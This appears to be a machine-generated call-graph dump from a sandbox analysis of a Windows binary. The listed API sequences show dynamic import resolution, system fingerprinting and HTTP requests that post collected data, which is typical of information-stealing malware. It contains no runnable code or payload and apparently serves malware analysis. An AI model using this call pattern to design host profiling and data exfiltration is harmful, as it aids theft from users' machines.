14207 c038de 14206->14207 14208 c045c0 2 API calls 14207->14208 14209 c038f7 14208->14209 14210 c045c0 2 API calls 14209->14210 14211 c03910 14210->14211 14212 c045c0 2 API calls 14211->14212 14213 c03929 14212->14213 14214 c045c0 2 API calls 14213->14214 14215 c03942 14214->14215 14216 c045c0 2 API calls 14215->14216 14217 c0395b 14216->14217 14218 c045c0 2 API calls 14217->14218 14219 c03974 14218->14219 14220 c045c0 2 API calls 14219->14220 14221 c0398d 14220->14221 14222 c045c0 2 API calls 14221->14222 14223 c039a6 14222->14223 14224 c045c0 2 API calls 14223->14224 14225 c039bf 14224->14225 14226 c045c0 2 API calls 14225->14226 14227 c039d8 14226->14227 14228 c045c0 2 API calls 14227->14228 14229 c039f1 14228->14229 14230 c045c0 2 API calls 14229->14230 14231 c03a0a 14230->14231 14232 c045c0 2 API calls 14231->14232 14233 c03a23 14232->14233 14234 c045c0 2 API calls 14233->14234 14235 c03a3c 14234->14235 14236 c045c0 2 API calls 14235->14236 14237 c03a55 14236->14237 14238 c045c0 2 API calls 14237->14238 14239 c03a6e 14238->14239 14240 c045c0 2 API calls 14239->14240 14241 c03a87 14240->14241 14242 c045c0 2 API calls 14241->14242 14243 c03aa0 14242->14243 14244 c045c0 2 API calls 14243->14244 14245 c03ab9 14244->14245 14246 c045c0 2 API calls 14245->14246 14247 c03ad2 14246->14247 14248 c045c0 2 API calls 14247->14248 14249 c03aeb 14248->14249 14250 c045c0 2 API calls 14249->14250 14251 c03b04 14250->14251 14252 c045c0 2 API calls 14251->14252 14253 c03b1d 14252->14253 14254 c045c0 2 API calls 14253->14254 14255 c03b36 14254->14255 14256 c045c0 2 API calls 14255->14256 14257 c03b4f 14256->14257 14258 c045c0 2 API calls 14257->14258 14259 c03b68 14258->14259 14260 c045c0 2 API calls 14259->14260 14261 c03b81 14260->14261 14262 c045c0 2 API calls 14261->14262 14263 c03b9a 14262->14263 14264 c045c0 2 API calls 14263->14264 14265 c03bb3 14264->14265 14266 c045c0 2 API calls 14265->14266 14267 c03bcc 14266->14267 14268 c045c0 2 API calls 14267->14268 14269 c03be5 14268->14269 14270 c045c0 2 API calls 14269->14270 14271 c03bfe 14270->14271 14272 c045c0 2 API calls 14271->14272 14273 c03c17 14272->14273 14274 c045c0 2 API calls 14273->14274 14275 c03c30 14274->14275 14276 c045c0 2 API calls 14275->14276 14277 c03c49 14276->14277 14278 c045c0 2 API calls 14277->14278 14279 c03c62 14278->14279 14280 c045c0 2 API calls 14279->14280 14281 c03c7b 14280->14281 14282 c045c0 2 API calls 14281->14282 14283 c03c94 14282->14283 14284 c045c0 2 API calls 14283->14284 14285 c03cad 14284->14285 14286 c045c0 2 API calls 14285->14286 14287 c03cc6 14286->14287 14288 c045c0 2 API calls 14287->14288 14289 c03cdf 14288->14289 14290 c045c0 2 API calls 14289->14290 14291 c03cf8 14290->14291 14292 c045c0 2 API calls 14291->14292 14293 c03d11 14292->14293 14294 c045c0 2 API calls 14293->14294 14295 c03d2a 14294->14295 14296 c045c0 2 API calls 14295->14296 14297 c03d43 14296->14297 14298 c045c0 2 API calls 14297->14298 14299 c03d5c 14298->14299 14300 c045c0 2 API calls 14299->14300 14301 c03d75 14300->14301 14302 c045c0 2 API calls 14301->14302 14303 c03d8e 14302->14303 14304 c045c0 2 API calls 14303->14304 14305 c03da7 14304->14305 14306 c045c0 2 API calls 14305->14306 14307 c03dc0 14306->14307 14308 c045c0 2 API calls 14307->14308 14309 c03dd9 14308->14309 14310 c045c0 2 API calls 14309->14310 14311 c03df2 14310->14311 14312 c045c0 2 API calls 14311->14312 14313 c03e0b 14312->14313 14314 c045c0 2 API calls 14313->14314 14315 c03e24 14314->14315 14316 c045c0 2 API calls 14315->14316 14317 c03e3d 14316->14317 14318 c045c0 2 API calls 14317->14318 14319 c03e56 14318->14319 14320 c045c0 2 API calls 14319->14320 14321 c03e6f 14320->14321 14322 c045c0 2 API calls 14321->14322 14323 c03e88 14322->14323 14324 c045c0 2 API calls 14323->14324 14325 c03ea1 14324->14325 14326 c045c0 2 API calls 14325->14326 14327 c03eba 14326->14327 14328 c045c0 2 API calls 14327->14328 14329 c03ed3 14328->14329 14330 c045c0 2 API calls 14329->14330 14331 c03eec 14330->14331 14332 c045c0 2 API calls 14331->14332 14333 c03f05 14332->14333 14334 c045c0 2 API calls 14333->14334 14335 c03f1e 14334->14335 14336 c045c0 2 API calls 14335->14336 14337 c03f37 14336->14337 14338 c045c0 2 API calls 14337->14338 14339 c03f50 14338->14339 14340 c045c0 2 API calls 14339->14340 14341 c03f69 14340->14341 14342 c045c0 2 API calls 14341->14342 14343 c03f82 14342->14343 14344 c045c0 2 API calls 14343->14344 14345 c03f9b 14344->14345 14346 c045c0 2 API calls 14345->14346 14347 c03fb4 14346->14347 14348 c045c0 2 API calls 14347->14348 14349 c03fcd 14348->14349 14350 c045c0 2 API calls 14349->14350 14351 c03fe6 14350->14351 14352 c045c0 2 API calls 14351->14352 14353 c03fff 14352->14353 14354 c045c0 2 API calls 14353->14354 14355 c04018 14354->14355 14356 c045c0 2 API calls 14355->14356 14357 c04031 14356->14357 14358 c045c0 2 API calls 14357->14358 14359 c0404a 14358->14359 14360 c045c0 2 API calls 14359->14360 14361 c04063 14360->14361 14362 c045c0 2 API calls 14361->14362 14363 c0407c 14362->14363 14364 c045c0 2 API calls 14363->14364 14365 c04095 14364->14365 14366 c045c0 2 API calls 14365->14366 14367 c040ae 14366->14367 14368 c045c0 2 API calls 14367->14368 14369 c040c7 14368->14369 14370 c045c0 2 API calls 14369->14370 14371 c040e0 14370->14371 14372 c045c0 2 API calls 14371->14372 14373 c040f9 14372->14373 14374 c045c0 2 API calls 14373->14374 14375 c04112 14374->14375 14376 c045c0 2 API calls 14375->14376 14377 c0412b 14376->14377 14378 c045c0 2 API calls 14377->14378 14379 c04144 14378->14379 14380 c045c0 2 API calls 14379->14380 14381 c0415d 14380->14381 14382 c045c0 2 API calls 14381->14382 14383 c04176 14382->14383 14384 c045c0 2 API calls 14383->14384 14385 c0418f 14384->14385 14386 c045c0 2 API calls 14385->14386 14387 c041a8 14386->14387 14388 c045c0 2 API calls 14387->14388 14389 c041c1 14388->14389 14390 c045c0 2 API calls 14389->14390 14391 c041da 14390->14391 14392 c045c0 2 API calls 14391->14392 14393 c041f3 14392->14393 14394 c045c0 2 API calls 14393->14394 14395 c0420c 14394->14395 14396 c045c0 2 API calls 14395->14396 14397 c04225 14396->14397 14398 c045c0 2 API calls 14397->14398 14399 c0423e 14398->14399 14400 c045c0 2 API calls 14399->14400 14401 c04257 14400->14401 14402 c045c0 2 API calls 14401->14402 14403 c04270 14402->14403 14404 c045c0 2 API calls 14403->14404 14405 c04289 14404->14405 14406 c045c0 2 API calls 14405->14406 14407 c042a2 14406->14407 14408 c045c0 2 API calls 14407->14408 14409 c042bb 14408->14409 14410 c045c0 2 API calls 14409->14410 14411 c042d4 14410->14411 14412 c045c0 2 API calls 14411->14412 14413 c042ed 14412->14413 14414 c045c0 2 API calls 14413->14414 14415 c04306 14414->14415 14416 c045c0 2 API calls 14415->14416 14417 c0431f 14416->14417 14418 c045c0 2 API calls 14417->14418 14419 c04338 14418->14419 14420 c045c0 2 API calls 14419->14420 14421 c04351 14420->14421 14422 c045c0 2 API calls 14421->14422 14423 c0436a 14422->14423 14424 c045c0 2 API calls 14423->14424 14425 c04383 14424->14425 14426 c045c0 2 API calls 14425->14426 14427 c0439c 14426->14427 14428 c045c0 2 API calls 14427->14428 14429 c043b5 14428->14429 14430 c045c0 2 API calls 14429->14430 14431 c043ce 14430->14431 14432 c045c0 2 API calls 14431->14432 14433 c043e7 14432->14433 14434 c045c0 2 API calls 14433->14434 14435 c04400 14434->14435 14436 c045c0 2 API calls 14435->14436 14437 c04419 14436->14437 14438 c045c0 2 API calls 14437->14438 14439 c04432 14438->14439 14440 c045c0 2 API calls 14439->14440 14441 c0444b 14440->14441 14442 c045c0 2 API calls 14441->14442 14443 c04464 14442->14443 14444 c045c0 2 API calls 14443->14444 14445 c0447d 14444->14445 14446 c045c0 2 API calls 14445->14446 14447 c04496 14446->14447 14448 c045c0 2 API calls 14447->14448 14449 c044af 14448->14449 14450 c045c0 2 API calls 14449->14450 14451 c044c8 14450->14451 14452 c045c0 2 API calls 14451->14452 14453 c044e1 14452->14453 14454 c045c0 2 API calls 14453->14454 14455 c044fa 14454->14455 14456 c045c0 2 API calls 14455->14456 14457 c04513 14456->14457 14458 c045c0 2 API calls 14457->14458 14459 c0452c 14458->14459 14460 c045c0 2 API calls 14459->14460 14461 c04545 14460->14461 14462 c045c0 2 API calls 14461->14462 14463 c0455e 14462->14463 14464 c045c0 2 API calls 14463->14464 14465 c04577 14464->14465 14466 c045c0 2 API calls 14465->14466 14467 c04590 14466->14467 14468 c045c0 2 API calls 14467->14468 14469 c045a9 14468->14469 14470 c19c10 14469->14470 14471 c19c20 43 API calls 14470->14471 14472 c1a036 8 API calls 14470->14472 14471->14472 14473 c1a146 14472->14473 14474 c1a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14472->14474 14475 c1a153 8 API calls 14473->14475 14476 c1a216 14473->14476 14474->14473 14475->14476 14477 c1a298 14476->14477 14478 c1a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14476->14478 14479 c1a2a5 6 API calls 14477->14479 14480 c1a337 14477->14480 14478->14477 14479->14480 14481 c1a344 9 API calls 14480->14481 14482 c1a41f 14480->14482 14481->14482 14483 c1a4a2 14482->14483 14484 c1a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14482->14484 14485 c1a4ab GetProcAddress GetProcAddress 14483->14485 14486 c1a4dc 14483->14486 14484->14483 14485->14486 14487 c1a515 14486->14487 14488 c1a4e5 GetProcAddress GetProcAddress 14486->14488 14489 c1a612 14487->14489 14490 c1a522 10 API calls 14487->14490 14488->14487 14491 c1a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14489->14491 14492 c1a67d 14489->14492 14490->14489 14491->14492 14493 c1a686 GetProcAddress 14492->14493 14494 c1a69e 14492->14494 14493->14494 14495 c1a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14494->14495 14496 c15ca3 14494->14496 14495->14496 14497 c01590 14496->14497 15617 c01670 14497->15617 14500 c1a7a0 lstrcpy 14501 c015b5 14500->14501 14502 c1a7a0 lstrcpy 14501->14502 14503 c015c7 14502->14503 14504 c1a7a0 lstrcpy 14503->14504 14505 c015d9 14504->14505 14506 c1a7a0 lstrcpy 14505->14506 14507 c01663 14506->14507 14508 c15510 14507->14508 14509 c15521 14508->14509 14510 c1a820 2 API calls 14509->14510 14511 c1552e 14510->14511 14512 c1a820 2 API calls 14511->14512 14513 c1553b 14512->14513 14514 c1a820 2 API calls 14513->14514 14515 c15548 14514->14515 14516 c1a740 lstrcpy 14515->14516 14517 c15555 14516->14517 14518 c1a740 lstrcpy 14517->14518 14519 c15562 14518->14519 14520 c1a740 lstrcpy 14519->14520 14521 c1556f 14520->14521 14522 c1a740 lstrcpy 14521->14522 14561 c1557c 14522->14561 14523 c1a740 lstrcpy 14523->14561 14524 c15643 StrCmpCA 14524->14561 14525 c156a0 StrCmpCA 14526 c157dc 14525->14526 14525->14561 14527 c1a8a0 lstrcpy 14526->14527 14528 c157e8 14527->14528 14529 c1a820 2 API calls 14528->14529 14531 c157f6 14529->14531 14530 c151f0 20 API calls 14530->14561 14533 c1a820 2 API calls 14531->14533 14532 c15856 StrCmpCA 14534 c15991 14532->14534 14532->14561 14536 c15805 14533->14536 14535 c1a8a0 lstrcpy 14534->14535 14538 c1599d 14535->14538 14539 c01670 lstrcpy 14536->14539 14537 c01590 lstrcpy 14537->14561 14540 c1a820 2 API calls 14538->14540 14559 c15811 14539->14559 14542 c159ab 14540->14542 14541 c1a820 lstrlen lstrcpy 14541->14561 14545 c1a820 2 API calls 14542->14545 14543 c15a0b StrCmpCA 14546 c15a16 Sleep 14543->14546 14547 c15a28 14543->14547 14544 c152c0 25 API calls 14544->14561 14549 c159ba 14545->14549 14546->14561 14550 c1a8a0 lstrcpy 14547->14550 14548 c1a7a0 lstrcpy 14548->14561 14551 c01670 lstrcpy 14549->14551 14552 c15a34 14550->14552 14551->14559 14553 c1a820 2 API calls 14552->14553 14554 c15a43 14553->14554 14555 c1a820 2 API calls 14554->14555 14556 c15a52 14555->14556 14558 c01670 lstrcpy 14556->14558 14557 c1578a StrCmpCA 14557->14561 14558->14559 14559->13615 14560 c1593f StrCmpCA 14560->14561 14561->14523 14561->14524 14561->14525 14561->14530 14561->14532 14561->14537 14561->14541 14561->14543 14561->14544 14561->14548 14561->14557 14561->14560 14562 c1a8a0 lstrcpy 14561->14562 14562->14561 14564 c17553 GetVolumeInformationA 14563->14564 14565 c1754c 14563->14565 14566 c17591 14564->14566 14565->14564 14567 c175fc GetProcessHeap RtlAllocateHeap 14566->14567 14568 c17619 14567->14568 14569 c17628 wsprintfA 14567->14569 14570 c1a740 lstrcpy 14568->14570 14571 c1a740 lstrcpy 14569->14571 14572 c15da7 14570->14572 14571->14572 14572->13636 14574 c1a7a0 lstrcpy 14573->14574 14575 c04899 14574->14575 15626 c047b0 14575->15626 14577 c048a5 14578 c1a740 lstrcpy 14577->14578 14579 c048d7 14578->14579 14580 c1a740 lstrcpy 14579->14580 14581 c048e4 14580->14581 14582 c1a740 lstrcpy 14581->14582 14583 c048f1 14582->14583 14584 c1a740 lstrcpy 14583->14584 14585 c048fe 14584->14585 14586 c1a740 lstrcpy 14585->14586 14587 c0490b InternetOpenA StrCmpCA 14586->14587 14588 c04944 14587->14588 14589 c04955 14588->14589 14590 c04ecb InternetCloseHandle 14588->14590 15637 c18b60 14589->15637 14592 c04ee8 14590->14592 15632 c09ac0 CryptStringToBinaryA 14592->15632 14593 c04963 15645 c1a920 14593->15645 14596 c04976 14598 c1a8a0 lstrcpy 14596->14598 14604 c0497f 14598->14604 14599 c1a820 2 API calls 14600 c04f05 14599->14600 14602 c1a9b0 4 API calls 14600->14602 14601 c04f27 codecvt 14606 c1a7a0 lstrcpy 14601->14606 14603 c04f1b 14602->14603 14605 c1a8a0 lstrcpy 14603->14605 14607 c1a9b0 4 API calls 14604->14607 14605->14601 14618 c04f57 14606->14618 14608 c049a9 14607->14608 14609 c1a8a0 lstrcpy 14608->14609 14610 c049b2 14609->14610 14611 c1a9b0 4 API calls 14610->14611 14612 c049d1 14611->14612 14613 c1a8a0 lstrcpy 14612->14613 14614 c049da 14613->14614 14615 c1a920 3 API calls 14614->14615 14616 c049f8 14615->14616 14617 c1a8a0 lstrcpy 14616->14617 14619 c04a01 14617->14619 14618->13639 14620 c1a9b0 4 API calls 14619->14620 14621 c04a20 14620->14621 14622 c1a8a0 lstrcpy 14621->14622 14623 c04a29 14622->14623 14624 c1a9b0 4 API calls 14623->14624 14625 c04a48 14624->14625 14626 c1a8a0 lstrcpy 14625->14626 14627 c04a51 14626->14627 14628 c1a9b0 4 API calls 14627->14628 14629 c04a7d 14628->14629 14630 c1a920 3 API calls 14629->14630 14631 c04a84 14630->14631 14632 c1a8a0 lstrcpy 14631->14632 14633 c04a8d 14632->14633 14634 c04aa3 InternetConnectA 14633->14634 14634->14590 14635 c04ad3 HttpOpenRequestA 14634->14635 14637 c04b28 14635->14637 14638 c04ebe InternetCloseHandle 14635->14638 14639 c1a9b0 4 API calls 14637->14639 14638->14590 14640 c04b3c 14639->14640 14641 c1a8a0 lstrcpy 14640->14641 14642 c04b45 14641->14642 14643 c1a920 3 API calls 14642->14643 14644 c04b63 14643->14644 14645 c1a8a0 lstrcpy 14644->14645 14646 c04b6c 14645->14646 14647 c1a9b0 4 API calls 14646->14647 14648 c04b8b 14647->14648 14649 c1a8a0 lstrcpy 14648->14649 14650 c04b94 14649->14650 14651 c1a9b0 4 API calls 14650->14651 14652 c04bb5 14651->14652 14653 c1a8a0 lstrcpy 14652->14653 14654 c04bbe 14653->14654 14655 c1a9b0 4 API calls 14654->14655 14656 c04bde 14655->14656 14657 c1a8a0 lstrcpy 14656->14657 14658 c04be7 14657->14658 14659 c1a9b0 4 API calls 14658->14659 14660 c04c06 14659->14660 14661 c1a8a0 lstrcpy 14660->14661 14662 c04c0f 14661->14662 14663 c1a920 3 API calls 14662->14663 14664 c04c2d 14663->14664 14665 c1a8a0 lstrcpy 14664->14665 14666 c04c36 14665->14666 14667 c1a9b0 4 API calls 14666->14667 14668 c04c55 14667->14668 14669 c1a8a0 lstrcpy 14668->14669 14670 c04c5e 14669->14670 14671 c1a9b0 4 API calls 14670->14671 14672 c04c7d 14671->14672 14673 c1a8a0 lstrcpy 14672->14673 14674 c04c86 14673->14674 14675 c1a920 3 API calls 14674->14675 14676 c04ca4 14675->14676 14677 c1a8a0 lstrcpy 14676->14677 14678 c04cad 14677->14678 14679 c1a9b0 4 API calls 14678->14679 14680 c04ccc 14679->14680 14681 c1a8a0 lstrcpy 14680->14681 14682 c04cd5 14681->14682 14683 c1a9b0 4 API calls 14682->14683 14684 c04cf6 14683->14684 14685 c1a8a0 lstrcpy 14684->14685 14686 c04cff 14685->14686 14687 c1a9b0 4 API calls 14686->14687 14688 c04d1f 14687->14688 14689 c1a8a0 lstrcpy 14688->14689 14690 c04d28 14689->14690 14691 c1a9b0 4 API calls 14690->14691 14692 c04d47 14691->14692 14693 c1a8a0 lstrcpy 14692->14693 14694 c04d50 14693->14694 14695 c1a920 3 API calls 14694->14695 14696 c04d6e 14695->14696 14697 c1a8a0 lstrcpy 14696->14697 14698 c04d77 14697->14698 14699 c1a740 lstrcpy 14698->14699 14700 c04d92 14699->14700 14701 c1a920 3 API calls 14700->14701 14702 c04db3 14701->14702 14703 c1a920 3 API calls 14702->14703 14704 c04dba 14703->14704 14705 c1a8a0 lstrcpy 14704->14705 14706 c04dc6 14705->14706 14707 c04de7 lstrlen 14706->14707 14708 c04dfa 14707->14708 14709 c04e03 lstrlen 14708->14709 15651 c1aad0 14709->15651 14711 c04e13 HttpSendRequestA 14712 c04e32 InternetReadFile 14711->14712 14713 c04e67 InternetCloseHandle 14712->14713 14718 c04e5e 14712->14718 14715 c1a800 14713->14715 14715->14638 14716 c1a9b0 4 API calls 14716->14718 14717 c1a8a0 lstrcpy 14717->14718 14718->14712 14718->14713 14718->14716 14718->14717 15653 c1aad0 14719->15653 14721 c117c4 StrCmpCA 14722 c117d7 14721->14722 14723 c117cf ExitProcess 14721->14723 14724 c119c2 14722->14724 14725 c118ad StrCmpCA 14722->14725 14726 c118cf StrCmpCA 14722->14726 14727 c118f1 StrCmpCA 14722->14727 14728 c11951 StrCmpCA 14722->14728 14729 c11970 StrCmpCA 14722->14729 14730 c11913 StrCmpCA 14722->14730 14731 c11932 StrCmpCA 14722->14731 14732 c1185d StrCmpCA 14722->14732 14733 c1187f StrCmpCA 14722->14733 14734 c1a820 lstrlen lstrcpy 14722->14734 14724->13641 14725->14722 14726->14722 14727->14722 14728->14722 14729->14722 14730->14722 14731->14722 14732->14722 14733->14722 14734->14722 14736 c1a7a0 lstrcpy 14735->14736 14737 c05979 14736->14737 14738 c047b0 2 API calls 14737->14738 14739 c05985 14738->14739 14740 c1a740 lstrcpy 14739->14740 14741 c059ba 14740->14741 14742 c1a740 lstrcpy 14741->14742 14743 c059c7 14742->14743 14744 c1a740 lstrcpy 14743->14744 14745 c059d4 14744->14745 14746 c1a740 lstrcpy 14745->14746 14747 c059e1 14746->14747 14748 c1a740 lstrcpy 14747->14748 14749 c059ee InternetOpenA StrCmpCA 14748->14749 14750 c05a1d 14749->14750 14751 c05fc3 InternetCloseHandle 14750->14751 14752 c18b60 3 API calls 14750->14752 14753 c05fe0 14751->14753 14754 c05a3c 14752->14754 14756 c09ac0 4 API calls 14753->14756 14755 c1a920 3 API calls 14754->14755 14757 c05a4f 14755->14757 14758 c05fe6 14756->14758 14759 c1a8a0 lstrcpy 14757->14759 14760 c1a820 2 API calls 14758->14760 14762 c0601f codecvt 14758->14762 14764 c05a58 14759->14764 14761 c05ffd 14760->14761 14763 c1a9b0 4 API calls 14761->14763 14766 c1a7a0 lstrcpy 14762->14766 14765 c06013 14763->14765 14768 c1a9b0 4 API calls 14764->14768 14767 c1a8a0 lstrcpy 14765->14767 14776 c0604f 14766->14776 14767->14762 14769 c05a82 14768->14769 14770 c1a8a0 lstrcpy 14769->14770 14771 c05a8b 14770->14771 14772 c1a9b0 4 API calls 14771->14772 14773 c05aaa 14772->14773 14774 c1a8a0 lstrcpy 14773->14774 14775 c05ab3 14774->14775 14777 c1a920 3 API calls 14775->14777 14776->13647 14778 c05ad1 14777->14778 14779 c1a8a0 lstrcpy 14778->14779 14780 c05ada 14779->14780 14781 c1a9b0 4 API calls 14780->14781 14782 c05af9 14781->14782 14783 c1a8a0 lstrcpy 14782->14783 14784 c05b02 14783->14784 14785 c1a9b0 4 API calls 14784->14785 14786 c05b21 14785->14786 14787 c1a8a0 lstrcpy 14786->14787 14788 c05b2a 14787->14788 14789 c1a9b0 4 API calls 14788->14789 14790 c05b56 14789->14790 14791 c1a920 3 API calls 14790->14791 14792 c05b5d 14791->14792 14793 c1a8a0 lstrcpy 14792->14793 14794 c05b66 14793->14794 14795 c05b7c InternetConnectA 14794->14795 14795->14751 14796 c05bac HttpOpenRequestA 14795->14796 14798 c05fb6 InternetCloseHandle 14796->14798 14799 c05c0b 14796->14799 14798->14751 14800 c1a9b0 4 API calls 14799->14800 14801 c05c1f 14800->14801 14802 c1a8a0 lstrcpy 14801->14802 14803 c05c28 14802->14803 14804 c1a920 3 API calls 14803->14804 14805 c05c46 14804->14805 14806 c1a8a0 lstrcpy 14805->14806 14807 c05c4f 14806->14807 14808 c1a9b0 4 API calls 14807->14808 14809 c05c6e 14808->14809 14810 c1a8a0 lstrcpy 14809->14810 14811 c05c77 14810->14811 14812 c1a9b0 4 API calls 14811->14812 14813 c05c98 14812->14813 14814 c1a8a0 lstrcpy 14813->14814 14815 c05ca1 14814->14815 14816 c1a9b0 4 API calls 14815->14816 14817 c05cc1 14816->14817 14818 c1a8a0 lstrcpy 14817->14818 14819 c05cca 14818->14819 14820 c1a9b0 4 API calls 14819->14820 14821 c05ce9 14820->14821 14822 c1a8a0 lstrcpy 14821->14822 14823 c05cf2 14822->14823 14824 c1a920 3 API calls 14823->14824 14825 c05d10 14824->14825 14826 c1a8a0 lstrcpy 14825->14826 14827 c05d19 14826->14827 14828 c1a9b0 4 API calls 14827->14828 14829 c05d38 14828->14829 14830 c1a8a0 lstrcpy 14829->14830 14831 c05d41 14830->14831 14832 c1a9b0 4 API calls 14831->14832 14833 c05d60 14832->14833 14834 c1a8a0 lstrcpy 14833->14834 14835 c05d69 14834->14835 14836 c1a920 3 API calls 14835->14836 14837 c05d87 14836->14837 14838 c1a8a0 lstrcpy 14837->14838 14839 c05d90 14838->14839 14840 c1a9b0 4 API calls 14839->14840 14841 c05daf 14840->14841 14842 c1a8a0 lstrcpy 14841->14842 14843 c05db8 14842->14843 14844 c1a9b0 4 API calls 14843->14844 14845 c05dd9 14844->14845 14846 c1a8a0 lstrcpy 14845->14846 14847 c05de2 14846->14847 14848 c1a9b0 4 API calls 14847->14848 14849 c05e02 14848->14849 14850 c1a8a0 lstrcpy 14849->14850 14851 c05e0b 14850->14851 14852 c1a9b0 4 API calls 14851->14852 14853 c05e2a 14852->14853 14854 c1a8a0 lstrcpy 14853->14854 14855 c05e33 14854->14855 14856 c1a920 3 API calls 14855->14856 14857 c05e54 14856->14857 14858 c1a8a0 lstrcpy 14857->14858 14859 c05e5d 14858->14859 14860 c05e70 lstrlen 14859->14860 15654 c1aad0 14860->15654 14862 c05e81 lstrlen GetProcessHeap RtlAllocateHeap 15655 c1aad0 14862->15655 14864 c05eae lstrlen 14865 c05ebe 14864->14865 14866 c05ed7 lstrlen 14865->14866 14867 c05ee7 14866->14867 14868 c05ef0 lstrlen 14867->14868 14869 c05f04 14868->14869 14870 c05f1a lstrlen 14869->14870 15656 c1aad0 14870->15656 14872 c05f2a HttpSendRequestA 14873 c05f35 InternetReadFile 14872->14873 14874 c05f6a InternetCloseHandle 14873->14874 14878 c05f61 14873->14878 14874->14798 14876 c1a9b0 4 API calls 14876->14878 14877 c1a8a0 lstrcpy 14877->14878 14878->14873 14878->14874 14878->14876 14878->14877 14881 c11077 14879->14881 14880 c11151 14880->13649 14881->14880 14882 c1a820 lstrlen lstrcpy 14881->14882 14882->14881 14884 c10db7 14883->14884 14885 c10f17 14884->14885 14886 c10ea4 StrCmpCA 14884->14886 14887 c10e27 StrCmpCA 14884->14887 14888 c10e67 StrCmpCA 14884->14888 14889 c1a820 lstrlen lstrcpy 14884->14889 14885->13657 14886->14884 14887->14884 14888->14884 14889->14884 14891 c10f67 14890->14891 14892 c10fb2 StrCmpCA 14891->14892 14893 c11044 14891->14893 14894 c1a820 lstrlen lstrcpy 14891->14894 14892->14891 14893->13665 14894->14891 14896 c1a740 lstrcpy 14895->14896 14897 c11a26 14896->14897 14898 c1a9b0 4 API calls 14897->14898 14899 c11a37 14898->14899 14900 c1a8a0 lstrcpy 14899->14900 14901 c11a40 14900->14901 14902 c1a9b0 4 API calls 14901->14902 14903 c11a5b 14902->14903 14904 c1a8a0 lstrcpy 14903->14904 14905 c11a64 14904->14905 14906 c1a9b0 4 API calls 14905->14906 14907 c11a7d 14906->14907 14908 c1a8a0 lstrcpy 14907->14908 14909 c11a86 14908->14909 14910 c1a9b0 4 API calls 14909->14910 14911 c11aa1 14910->14911 14912 c1a8a0 lstrcpy 14911->14912 14913 c11aaa 14912->14913 14914 c1a9b0 4 API calls 14913->14914 14915 c11ac3 14914->14915 14916 c1a8a0 lstrcpy 14915->14916 14917 c11acc 14916->14917 14918 c1a9b0 4 API calls 14917->14918 14919 c11ae7 14918->14919 14920 c1a8a0 lstrcpy 14919->14920 14921 c11af0 14920->14921 14922 c1a9b0 4 API calls 14921->14922 14923 c11b09 14922->14923 14924 c1a8a0 lstrcpy 14923->14924 14925 c11b12 14924->14925 14926 c1a9b0 4 API calls 14925->14926 14927 c11b2d 14926->14927 14928 c1a8a0 lstrcpy 14927->14928 14929 c11b36 14928->14929 14930 c1a9b0 4 API calls 14929->14930 14931 c11b4f 14930->14931 14932 c1a8a0 lstrcpy 14931->14932 14933 c11b58 14932->14933 14934 c1a9b0 4 API calls 14933->14934 14935 c11b76 14934->14935 14936 c1a8a0 lstrcpy 14935->14936 14937 c11b7f 14936->14937 14938 c17500 6 API calls 14937->14938 14939 c11b96 14938->14939 14940 c1a920 3 API calls 14939->14940 14941 c11ba9 14940->14941 14942 c1a8a0 lstrcpy 14941->14942 14943 c11bb2 14942->14943 14944 c1a9b0 4 API calls 14943->14944 14945 c11bdc 14944->14945 14946 c1a8a0 lstrcpy 14945->14946 14947 c11be5 14946->14947 14948 c1a9b0 4 API calls 14947->14948 14949 c11c05 14948->14949 14950 c1a8a0 lstrcpy 14949->14950 14951 c11c0e 14950->14951 15657 c17690 GetProcessHeap RtlAllocateHeap 14951->15657 14954 c1a9b0 4 API calls 14955 c11c2e 14954->14955 14956 c1a8a0 lstrcpy 14955->14956 14957 c11c37 14956->14957 14958 c1a9b0 4 API calls 14957->14958 14959 c11c56 14958->14959 14960 c1a8a0 lstrcpy 14959->14960 14961 c11c5f 14960->14961 14962 c1a9b0 4 API calls 14961->14962 14963 c11c80 14962->14963 14964 c1a8a0 lstrcpy 14963->14964 14965 c11c89 14964->14965 15664 c177c0 GetCurrentProcess IsWow64Process 14965->15664 14968 c1a9b0 4 API calls 14969 c11ca9 14968->14969 14970 c1a8a0 lstrcpy 14969->14970 14971 c11cb2 14970->14971 14972 c1a9b0 4 API calls 14971->14972 14973 c11cd1 14972->14973 14974 c1a8a0 lstrcpy 14973->14974 14975 c11cda 14974->14975 14976 c1a9b0 4 API calls 14975->14976 14977 c11cfb 14976->14977 14978 c1a8a0 lstrcpy 14977->14978 14979 c11d04 14978->14979 14980 c17850 3 API calls 14979->14980 14981 c11d14 14980->14981 14982 c1a9b0 4 API calls 14981->14982 14983 c11d24 14982->14983 14984 c1a8a0 lstrcpy 14983->14984 14985 c11d2d 14984->14985 14986 c1a9b0 4 API calls 14985->14986 14987 c11d4c 14986->14987 14988 c1a8a0 lstrcpy 14987->14988 14989 c11d55 14988->14989 14990 c1a9b0 4 API calls 14989->14990 14991 c11d75 14990->14991 14992 c1a8a0 lstrcpy 14991->14992 14993 c11d7e 14992->14993 14994 c178e0 3 API calls 14993->14994 14995 c11d8e 14994->14995 14996 c1a9b0 4 API calls 14995->14996 14997 c11d9e 14996->14997 14998 c1a8a0 lstrcpy 14997->14998 14999 c11da7 14998->14999 15000 c1a9b0 4 API calls 14999->15000 15001 c11dc6 15000->15001 15002 c1a8a0 lstrcpy 15001->15002 15003 c11dcf 15002->15003 15004 c1a9b0 4 API calls 15003->15004 15005 c11df0 15004->15005 15006 c1a8a0 lstrcpy 15005->15006 15007 c11df9 15006->15007 15666 c17980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15007->15666 15010 c1a9b0 4 API calls 15011 c11e19 15010->15011 15012 c1a8a0 lstrcpy 15011->15012 15013 c11e22 15012->15013 15014 c1a9b0 4 API calls 15013->15014 15015 c11e41 15014->15015 15016 c1a8a0 lstrcpy 15015->15016 15017 c11e4a 15016->15017 15018 c1a9b0 4 API calls 15017->15018 15019 c11e6b 15018->15019 15020 c1a8a0 lstrcpy 15019->15020 15021 c11e74 15020->15021 15668 c17a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15021->15668 15024 c1a9b0 4 API calls 15025 c11e94 15024->15025 15026 c1a8a0 lstrcpy 15025->15026 15027 c11e9d 15026->15027 15028 c1a9b0 4 API calls 